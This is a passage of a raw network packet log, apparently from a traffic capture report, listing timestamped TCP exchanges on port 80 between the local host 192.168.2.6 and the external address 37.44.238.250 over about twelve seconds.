                                                                                  Jan 11, 2025 06:43:40.562644958 CET805705037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:40.562761068 CET5705080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:40.562985897 CET5705080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:40.567838907 CET805705037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:40.911035061 CET5705080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:40.915982008 CET805705037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:40.916055918 CET805705037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:40.916066885 CET805705037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.157025099 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.161909103 CET5705080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.161943913 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.162085056 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.162261009 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.166935921 CET805705037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.167011976 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.167051077 CET5705080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.415359020 CET5705980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.420325041 CET805705937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.420413971 CET5705980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.420749903 CET5705980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.425604105 CET805705937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.520301104 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.525156021 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.525187969 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.525199890 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.525233984 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.525284052 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.525291920 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.525305033 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.525309086 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.525341988 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.525343895 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.525353909 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.525355101 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.525409937 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.525424004 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.525434971 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.525469065 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.525501966 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.530355930 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.530373096 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.530383110 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.530392885 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.530405045 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.530414104 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.530436993 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.530459881 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.530504942 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.571559906 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.571741104 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.619563103 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.620320082 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.624427080 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.625160933 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.625365973 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.630227089 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630240917 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630270958 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630280972 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630305052 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.630326986 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630337954 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630337954 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.630388975 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.630394936 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630407095 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630451918 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630460024 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.630462885 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630507946 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.630518913 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630559921 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630601883 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630624056 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.630642891 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630678892 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.630682945 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630800009 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630810976 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630831957 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630872965 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630908966 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.630973101 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.631005049 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.631073952 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.631099939 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.631155968 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.631202936 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.631258965 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.631279945 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.635178089 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.635245085 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.635296106 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.635344028 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.635387897 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.635432959 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.635494947 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.635601997 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.635612011 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.635637045 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.635685921 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.635756969 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.635766983 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.770231009 CET5705980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:41.775127888 CET805705937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.775161028 CET805705937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.775171041 CET805705937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.809174061 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:41.863881111 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:42.078850031 CET805705937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:42.129470110 CET5705980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:42.245820999 CET805705937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:42.301359892 CET5705980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:42.364288092 CET5705980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:42.365083933 CET5706080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:42.369261980 CET805705937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:42.369324923 CET5705980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:42.369967937 CET805706037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:42.370110035 CET5706080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:42.370186090 CET5706080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:42.374923944 CET805706037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:42.451473951 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:42.504478931 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:42.723362923 CET5706080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:42.728384018 CET805706037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:42.728400946 CET805706037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:42.728410006 CET805706037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:43.008708954 CET805706037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:43.051373005 CET5706080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:43.140379906 CET805706037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:43.191972017 CET5706080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:43.270426989 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:43.270709038 CET5706080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:43.271332026 CET5706180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:43.275444984 CET805705537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:43.275525093 CET5705580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:43.275819063 CET805706037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:43.275876999 CET5706080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:43.276185036 CET805706137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:43.276263952 CET5706180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:43.276381016 CET5706180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:43.281228065 CET805706137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:43.629637957 CET5706180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:43.634639978 CET805706137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:43.634655952 CET805706137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:43.634674072 CET805706137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:43.915575027 CET805706137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:43.975647926 CET5706180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.044574022 CET805706137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.129518032 CET5706180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.184412003 CET5706380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.189368963 CET805706337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.189523935 CET5706380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.189635992 CET5706380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.194422960 CET805706337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.271071911 CET5706380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.271770000 CET5706480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.277129889 CET805706437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.277247906 CET5706480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.277412891 CET5706480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.282239914 CET805706437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.319720030 CET805706337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.397488117 CET5706580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.402337074 CET805706537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.402414083 CET5706580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.402563095 CET5706580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.407464027 CET805706537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.629692078 CET5706480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.634628057 CET805706437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.634701014 CET805706437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.656260967 CET805706337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.656333923 CET5706380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.754600048 CET5706580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:44.759591103 CET805706537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.759608984 CET805706537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.759623051 CET805706537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.925116062 CET805706437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:44.973382950 CET5706480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.037838936 CET805706537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.058109999 CET805706437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.082613945 CET5706580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.098232985 CET5706480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.166389942 CET805706537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.207593918 CET5706580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.284425974 CET5706480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.284497023 CET5706580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.285465002 CET5706680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.289423943 CET805706437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.289484024 CET5706480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.289727926 CET805706537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.289772987 CET5706580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.290268898 CET805706637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.290321112 CET5706680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.290443897 CET5706680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.295222998 CET805706637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.681310892 CET5706680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:45.686253071 CET805706637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.686294079 CET805706637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.686322927 CET805706637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.927762032 CET805706637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:45.973236084 CET5706680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.064291954 CET805706637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:46.113924980 CET5706680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.190772057 CET5706680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.191590071 CET5706780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.195807934 CET805706637.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:46.196098089 CET5706680192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.196469069 CET805706737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:46.196563959 CET5706780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.196674109 CET5706780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.201503038 CET805706737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:46.551577091 CET5706780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.556567907 CET805706737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:46.556586027 CET805706737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:46.556595087 CET805706737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:46.844347954 CET805706737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:46.895112038 CET5706780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:46.978204966 CET805706737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.020140886 CET5706780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:47.106992960 CET5706780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:47.108280897 CET5706880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:47.112179041 CET805706737.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.112237930 CET5706780192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:47.113095999 CET805706837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.113171101 CET5706880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:47.113392115 CET5706880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:47.118263006 CET805706837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.457885027 CET5706880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:47.463074923 CET805706837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.463145018 CET805706837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.463182926 CET805706837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.741918087 CET805706837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.785840034 CET5706880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:47.874331951 CET805706837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:47.926368952 CET5706880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.024524927 CET5706880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.029531002 CET805706837.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.033550024 CET5706880192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.044943094 CET5706980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.049742937 CET805706937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.053554058 CET5706980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.068737030 CET5706980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.073623896 CET805706937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.443443060 CET5706980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.448513985 CET805706937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.448527098 CET805706937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.448537111 CET805706937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.681979895 CET805706937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.723274946 CET5706980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.846643925 CET805706937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.895133972 CET5706980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.979525089 CET5706980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.980341911 CET5707080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.984602928 CET805706937.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.984666109 CET5706980192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.985176086 CET805707037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:48.985256910 CET5707080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.985371113 CET5707080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:48.990187883 CET805707037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:49.333055973 CET5707080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:49.337944984 CET805707037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:49.337960005 CET805707037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:49.337965012 CET805707037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:49.617538929 CET805707037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:49.660859108 CET5707080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:49.747021914 CET805707037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:49.801352024 CET5707080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:49.883872032 CET5707080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:49.884687901 CET5707180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:49.888883114 CET805707037.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:49.889122009 CET5707080192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:49.889579058 CET805707137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:49.889647961 CET5707180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:49.889760017 CET5707180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:49.894490957 CET805707137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.079408884 CET5707280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.082178116 CET5707180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.084248066 CET805707237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.084330082 CET5707280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.084434986 CET5707280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.089226007 CET805707237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.127635956 CET805707137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.209419012 CET5707380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.214416027 CET805707337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.214634895 CET5707380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.215289116 CET5707380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.220109940 CET805707337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.334690094 CET805707137.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.335453033 CET5707180192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.442106009 CET5707280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.447088957 CET805707237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.447160959 CET805707237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.567225933 CET5707380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.572144985 CET805707337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.572163105 CET805707337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.572173119 CET805707337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.712759972 CET805707237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.754511118 CET5707280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.842292070 CET805707237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.853636980 CET805707337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:50.895128965 CET5707380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.895133972 CET5707280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:50.984355927 CET805707337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.035756111 CET5707380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.206871986 CET5707280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.207020998 CET5707380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.212306976 CET805707237.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.212431908 CET805707337.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.212502003 CET5707280192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.212534904 CET5707380192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.214302063 CET5707480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.219335079 CET805707437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.219430923 CET5707480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.219702959 CET5707480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.226299047 CET805707437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.567353964 CET5707480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.572242022 CET805707437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.572257996 CET805707437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.572280884 CET805707437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.855947971 CET805707437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:51.910778046 CET5707480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:51.988027096 CET805707437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:52.035765886 CET5707480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:52.115012884 CET5707480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:52.116060972 CET5707580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:52.120145082 CET805707437.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:52.120204926 CET5707480192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:52.120898962 CET805707537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:52.120976925 CET5707580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:52.121082067 CET5707580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:52.126205921 CET805707537.44.238.250192.168.2.6
                                                                                  Jan 11, 2025 06:43:52.473582029 CET5707580192.168.2.637.44.238.250
                                                                                  Jan 11, 2025 06:43:52.478532076 CET805707537.44.238.250192.168.2.6
